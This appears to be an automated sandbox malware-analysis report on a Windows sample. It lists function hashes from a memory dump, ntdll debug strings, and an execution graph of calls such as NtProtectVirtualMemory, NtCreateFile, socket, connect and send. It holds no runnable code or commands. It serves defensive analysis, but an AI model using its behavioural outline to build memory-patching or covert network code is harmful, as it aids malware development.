                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                                                                                                      • Instruction ID: 9ff1019f4df565ef91e79f655176ada9e6cf997fc154deb8236911a6644cdc5b
                                                                                                                      • Opcode Fuzzy Hash: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                                                                                                      • Instruction Fuzzy Hash: 6C90022228140803D144715895147075006D7D1601F55C021A0025554DC7168A6567B1
                                                                                                                      Function 011035C0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                                                                                      • Instruction ID: 55df88d00419f574049992b3107e915872bca788882001add47234a10ace856d
                                                                                                                      • Opcode Fuzzy Hash: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                                                                                      • Instruction Fuzzy Hash: 5390023264550403D10471585614706600597D1201F65C421A0425568DC7958A5166A2
                                                                                                                      Function 011039B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                                                                                      • Instruction ID: 74b9ef6855463ccaedf3495868ae146c0453b58f9c0941cad428be937e43eb05
                                                                                                                      • Opcode Fuzzy Hash: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                                                                                      • Instruction Fuzzy Hash: 3990022228545103D154715C55046169005B7E1201F55C031A0815594DC75589556321
                                                                                                                      Function 01103D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                                                                                      • Instruction ID: ebc52a100e29200ec724765ea6f91da961181937cb5dd548493885820925476b
                                                                                                                      • Opcode Fuzzy Hash: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                                                                                      • Instruction Fuzzy Hash: 1090023224240143954472586904A4E910597E2302B95D425A0016554CCB1489615321
                                                                                                                      Function 01103D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                                                                                      • Instruction ID: d39b0ae3ab75aec6a77046b35bcff3b0f27c41bf8becacb4bd7af50c9717c1df
                                                                                                                      • Opcode Fuzzy Hash: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                                                                                      • Instruction Fuzzy Hash: 2490023624140403D51471586904646504697D1301F55D421A0425558DC75489A1A221
                                                                                                                      Function 01102C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction ID: 1ba76a7c44a8124a06d03aa55a5ac600dc89aa48237e38d5e859caaf06bfd800
                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Function 01102890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                                                                                      • Instruction ID: fbf3b95a6427e36ca3ca0ef8e0a7a370e94793c7d415c7b8879e2a55fc7f33eb
                                                                                                                      • Opcode Fuzzy Hash: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                                                                                      • Instruction Fuzzy Hash: C351FBB5E00116BFCB1ADB5CC89497EFBF8BF48240714816AF595D7685E374DE4087A0
                                                                                                                      Function 01172410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                                                                                      • Instruction ID: 18996b3cf45ba46cd745311dad0b2e806d010b8bb2895075990dbbf11974460c
                                                                                                                      • Opcode Fuzzy Hash: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                                                                                      • Instruction Fuzzy Hash: B151F571A04646AECB38DF5CC8909BFBBF8EB48204B148469F5D6D7741E7B4EA41C760
                                                                                                                      Function 010F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Execute=1, xrefs: 01134713
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01134787
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01134742
                                                                                                                      • ExecuteOptions, xrefs: 011346A0
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01134725
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01134655
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011346FC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                                                                                      • Instruction ID: 41b98b34a775e4e636076482a87e7652e30a7b191adbf4f7e6ec7e6845f1cf4c
                                                                                                                      • Opcode Fuzzy Hash: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                                                                                      • Instruction Fuzzy Hash: 22511931A0021A6AEF25EBA8DC86FED77A8EF58704F0400EDD745AB5D1E7709A41CF52
                                                                                                                      Function 0110B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction ID: eeabe8a47d1a83e4402f02411c66318af36769c037ee9d8236b48dcdc7247f79
                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction Fuzzy Hash: 1781D378E092498EEF2FCE6CC8517FEBBB1AF45320F18455AD861A72D1C7B48940CB59
                                                                                                                      Function 011720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                      • Opcode ID: 98079a6e19fe46204cdef73c44b04f949d3cbab5d361e3744d68f5b881aa5ca8
                                                                                                                      • Instruction ID: eb2e6c8c592a11db77a7f737da97e2297df9a4ef3e28c9e1ce4db5bdd2c77f58
                                                                                                                      • Opcode Fuzzy Hash: 98079a6e19fe46204cdef73c44b04f949d3cbab5d361e3744d68f5b881aa5ca8
                                                                                                                      • Instruction Fuzzy Hash: 1F21657AE00159ABDB15DF79DC40AEEBBF8FF54654F040126E945D7340E730DA028BA1
                                                                                                                      Function 010EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011302E7
                                                                                                                      • RTL: Re-Waiting, xrefs: 0113031E
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011302BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                                                                                      • Instruction ID: 18a044f6b6f308b364f7cb3337da8736f8bb5a887f2a1e87bebc9e57c3e002c6
                                                                                                                      • Opcode Fuzzy Hash: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                                                                                      • Instruction Fuzzy Hash: 98E190706087429FE729CF29C888B2ABBE0BF88714F144A5DF5A58B2E1D774D945CB42
                                                                                                                      Function 010FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 01137BAC
                                                                                                                      • RTL: Resource at %p, xrefs: 01137B8E
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01137B7F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                                                                                      • Instruction ID: 9004b9c06e85b2910b020b3a57ca4499e4b68828d51e58053dc660a52c80193c
                                                                                                                      • Opcode Fuzzy Hash: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                                                                                      • Instruction Fuzzy Hash: FF41D3357047029FD729DE29CC41B6AB7E5EF98710F100A1DEA9A9BA80DB71E4058F91
                                                                                                                      Function 010FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113728C
                                                                                                                      Strings
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01137294
                                                                                                                      • RTL: Re-Waiting, xrefs: 011372C1
                                                                                                                      • RTL: Resource at %p, xrefs: 011372A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      • Opcode ID: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                                                                                      • Instruction ID: 76a9ff83bb737cb3d79a00de6cd3847aa750f2b22ef56ec07f8586dde39063bc
                                                                                                                      • Opcode Fuzzy Hash: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                                                                                      • Instruction Fuzzy Hash: 4E410271700203ABD729DE29CC42F6AB7A5FF94714F10061DFA95AB680DB31F8428BD1
                                                                                                                      Function 01172300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                      • Opcode ID: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                                                                                      • Instruction ID: dff2f91dd3d7c75f27f877311d446bbc30eaa769310df555791f991065951048
                                                                                                                      • Opcode Fuzzy Hash: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                                                                                      • Instruction Fuzzy Hash: 83317572A002199FDB24DF2DDC40BEEB7F8EF58614F54455AE949E7240EB30AA458BA0
                                                                                                                      Function 01107D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction ID: 5f450c6c40fd46670a887fced3e3fc4d694720ccd108c48e57e4f820ce4c57a1
                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction Fuzzy Hash: F791C570E002169BDF2EDF6DC8806BEBBA5BF44320F14451EE9A5A72C4D7B0AD408B52
                                                                                                                      Function 010C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                                                                                      • Instruction ID: fd367e354c0f1ce59b8e389373f3948d16b3c581cf0c5527d2a68e180d89bac1
                                                                                                                      • Opcode Fuzzy Hash: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                                                                                      • Instruction Fuzzy Hash: 06811C72D002699BDB35CB54CC45BEEBBB8AB48754F0041EAEA59B7240D7705E85CFA0

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:2.3%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:4.7%
                                                                                                                      Total number of Nodes:444
                                                                                                                      Total number of Limit Nodes:15
                                                                                                                      execution_graph 13508 e910e12 13512 e90f942 13508->13512 13510 e910e45 NtProtectVirtualMemory 13511 e910e70 13510->13511 13513 e90f967 13512->13513 13513->13510 13834 e905613 13836 e905620 13834->13836 13835 e905684 13836->13835 13837 e910e12 NtProtectVirtualMemory 13836->13837 13837->13836 13762 e909cd4 13764 e909cd8 13762->13764 13763 e90a022 13764->13763 13768 e909352 13764->13768 13766 e909f0d 13766->13763 13777 e909792 13766->13777 13769 e90939e 13768->13769 13770 e9094ec 13769->13770 13772 e909595 13769->13772 13776 e90958e 13769->13776 13771 e90f232 NtCreateFile 13770->13771 13774 e9094ff 13771->13774 13773 e90f232 NtCreateFile 13772->13773 13772->13776 13773->13776 13775 e90f232 NtCreateFile 13774->13775 13774->13776 13775->13776 13776->13766 13778 e9097e0 13777->13778 13779 e90f232 NtCreateFile 13778->13779 13781 e90990c 13779->13781 13780 e909af3 13780->13766 13781->13780 13782 e909352 NtCreateFile 13781->13782 13783 e909602 NtCreateFile 13781->13783 13782->13781 13783->13781 13914 e907dd9 13915 e907df0 13914->13915 13916 e90b382 ObtainUserAgentString 13915->13916 13917 e907ecd 13915->13917 13916->13917 13514 e9042dd 13515 e90431a 13514->13515 13516 e9043fa 13515->13516 13517 e904328 SleepEx 13515->13517 13521 e90ef12 13515->13521 13530 e905432 13515->13530 13540 e9040f2 13515->13540 13517->13515 13517->13517 13522 e90ef48 13521->13522 13525 e90f0e9 13522->13525 13527 e90f232 NtCreateFile 13522->13527 13529 e90f134 13522->13529 13546 e90ff82 13522->13546 13524 e90f125 13566 e90e922 13524->13566 13525->13524 13558 e90e842 13525->13558 13527->13522 13529->13515 13531 e90545b 13530->13531 13538 e9054c9 13530->13538 13532 e90f232 NtCreateFile 13531->13532 13531->13538 13533 e905496 13532->13533 13539 e9054c5 13533->13539 13578 e905082 13533->13578 13534 e90f232 NtCreateFile 13534->13538 13536 e9054b6 13536->13539 13587 e904f52 13536->13587 13538->13515 13539->13534 13539->13538 13541 e904109 13540->13541 13543 e9041d3 13540->13543 13592 e904012 13541->13592 13543->13515 13544 e904113 13544->13543 13545 e90ff82 6 API calls 13544->13545 13545->13543 13547 e90ffb8 13546->13547 13548 e90c5b2 socket 13547->13548 13549 e910081 13547->13549 13557 e910022 13547->13557 13548->13549 13550 e910134 13549->13550 13552 e910117 getaddrinfo 13549->13552 13549->13557 13551 e90c732 connect 13550->13551 13553 e9101b2 13550->13553 13550->13557 13551->13553 13552->13550 13554 e90c6b2 send 13553->13554 13553->13557 13556 e910729 13554->13556 13555 e9107f4 setsockopt recv 13555->13557 13556->13555 13556->13557 13557->13522 13559 e90e86d 13558->13559 13574 e90f232 13559->13574 13561 e90e906 13561->13525 13562 e90e888 13562->13561 13563 e90e8c5 13562->13563 13564 e90ff82 6 API calls 13562->13564 13563->13561 13565 e90f232 NtCreateFile 13563->13565 13564->13563 13565->13561 13567 e90e9c2 13566->13567 13568 e90f232 NtCreateFile 13567->13568 13569 e90e9d6 13568->13569 13570 e90ea9f 13569->13570 13572 e90ff82 6 API calls 13569->13572 13573 e90ea5d 13569->13573 13570->13529 13571 e90f232 NtCreateFile 13571->13570 13572->13573 13573->13570 13573->13571 13575 e90f25c 13574->13575 13577 e90f334 13574->13577 13576 e90f410 NtCreateFile 13575->13576 13575->13577 13576->13577 13577->13562 13579 e905420 13578->13579 13580 e9050aa 13578->13580 13579->13536 13580->13579 13581 e90f232 NtCreateFile 13580->13581 13583 e9051f9 13581->13583 13582 e9053df 13582->13536 13583->13582 13584 e90f232 NtCreateFile 13583->13584 13585 e9053c9 13584->13585 13586 e90f232 NtCreateFile 13585->13586 13586->13582 13588 e904f70 13587->13588 13589 e904f84 13587->13589 13588->13539 13590 e90f232 NtCreateFile 13589->13590 13591 e905046 13590->13591 13591->13539 13594 e904031 13592->13594 13593 e9040cd 13593->13544 13594->13593 13595 e90ff82 6 API calls 13594->13595 13595->13593 13784 e907edd 13786 e907f06 13784->13786 13785 e907fa4 13786->13785 13787 e9048f2 NtProtectVirtualMemory 13786->13787 13788 e907f9c 13787->13788 13789 e90b382 ObtainUserAgentString 13788->13789 13789->13785 13838 e911a1f 13839 e911a25 13838->13839 13842 e9055f2 13839->13842 13841 e911a3d 13843 e9055fb 13842->13843 13844 e90560e 13842->13844 13843->13844 13846 e90a662 13843->13846 13844->13841 13847 e90a66b 13846->13847 13855 e90a7ba 13846->13855 13848 e9040f2 6 API calls 13847->13848 13847->13855 13850 e90a6ee 13848->13850 13849 e90a750 13852 e90a83f 13849->13852 13854 e90a791 13849->13854 13849->13855 13850->13849 13851 e90ff82 6 API calls 13850->13851 13851->13849 13853 e90ff82 6 API calls 13852->13853 13852->13855 13853->13855 13854->13855 13856 e90ff82 6 API calls 13854->13856 13855->13844 13856->13855 13487 e90ff82 13488 e90ffb8 13487->13488 13490 e910081 13488->13490 13498 e910022 13488->13498 13499 e90c5b2 13488->13499 13491 e910134 13490->13491 13493 e910117 getaddrinfo 13490->13493 13490->13498 13494 e9101b2 13491->13494 13491->13498 13502 e90c732 13491->13502 13493->13491 13494->13498 13505 e90c6b2 13494->13505 13496 e9107f4 setsockopt recv 13496->13498 13497 e910729 13497->13496 13497->13498 13500 e90c60a socket 13499->13500 13501 e90c5ec 13499->13501 13500->13490 13501->13500 13503 e90c788 connect 13502->13503 13504 e90c76a 13502->13504 13503->13494 13504->13503 13506 e90c705 send 13505->13506 13507 e90c6e7 13505->13507 13506->13497 13507->13506 13937 e90914a 13938 e909153 13937->13938 13943 e909174 13937->13943 13940 e90b382 ObtainUserAgentString 13938->13940 13939 e9091e7 13941 e90916c 13940->13941 13942 e9040f2 6 API calls 13941->13942 13942->13943 13943->13939 13945 e9041f2 13943->13945 13946 e90420f 13945->13946 13949 e9042c9 13945->13949 13947 e90ef12 7 API calls 13946->13947 13950 e904242 13946->13950 13947->13950 13948 e904289 13948->13949 13951 e9040f2 6 API calls 13948->13951 13949->13943 13950->13948 13952 e905432 NtCreateFile 13950->13952 13951->13949 13952->13948 13857 e910e0a 13858 e910e45 NtProtectVirtualMemory 13857->13858 13859 e90f942 13857->13859 13860 e910e70 13858->13860 13859->13858 13881 e911a4d 13882 e911a53 13881->13882 13885 e905782 13882->13885 13884 e911a6b 13886 e90578f 13885->13886 13887 e9057ad 13886->13887 13888 e90a662 6 API calls 13886->13888 13887->13884 13888->13887 13918 e9119f1 13919 e9119f7 13918->13919 13922 e906852 13919->13922 13921 e911a0f 13923 e9068e4 13922->13923 13924 e906865 13922->13924 13923->13921 13924->13923 13926 e906887 13924->13926 13928 e90687e 13924->13928 13925 e90c36f 13925->13921 13926->13923 13927 e90a662 6 API calls 13926->13927 13927->13923 13928->13925 13929 e90c0c2 6 API calls 13928->13929 13929->13925 13790 e9040f1 13791 e904109 13790->13791 13792 e9041d3 13790->13792 13793 e904012 6 API calls 13791->13793 13794 e904113 13793->13794 13794->13792 13795 e90ff82 6 API calls 13794->13795 13795->13792 13930 e9055f1 13931 e905606 13930->13931 13932 e90560e 13930->13932 13933 e90a662 6 API calls 13931->13933 13933->13932 13483 e90f232 13484 e90f25c 13483->13484 13486 e90f334 13483->13486 13485 e90f410 NtCreateFile 13484->13485 13484->13486 13485->13486 13889 e9119b3 13890 e9119bd 13889->13890 13893 e9066d2 13890->13893 13892 e9119e0 13894 e906704 13893->13894 13895 e9066f7 13893->13895 13897 e90672d 13894->13897 13899 e906737 13894->13899 13901 e9066ff 13894->13901 13896 e9040f2 6 API calls 13895->13896 13896->13901 13902 e90c2c2 13897->13902 13900 e90ff82 6 API calls 13899->13900 13899->13901 13900->13901 13901->13892 13903 e90c2df 13902->13903 13904 e90c2cb 13902->13904 13903->13901 13904->13903 13905 e90c0c2 6 API calls 13904->13905 13905->13903 13796 e9082f4 13798 e908349 13796->13798 13797 e90849f 13799 e9048f2 NtProtectVirtualMemory 13797->13799 13803 e9084c3 13797->13803 13798->13797 13800 e9048f2 NtProtectVirtualMemory 13798->13800 13799->13803 13801 e908480 13800->13801 13802 e9048f2 NtProtectVirtualMemory 13801->13802 13802->13797 13804 e9048f2 NtProtectVirtualMemory 13803->13804 13805 e908597 13803->13805 13804->13805 13806 e9048f2 NtProtectVirtualMemory 13805->13806 13807 e9085bf 13805->13807 13806->13807 13811 e9048f2 NtProtectVirtualMemory 13807->13811 13812 e9086b9 13807->13812 13808 e9086e1 13809 e90b382 ObtainUserAgentString 13808->13809 13810 e9086e9 13809->13810 13811->13812 13812->13808 13813 e9048f2 NtProtectVirtualMemory 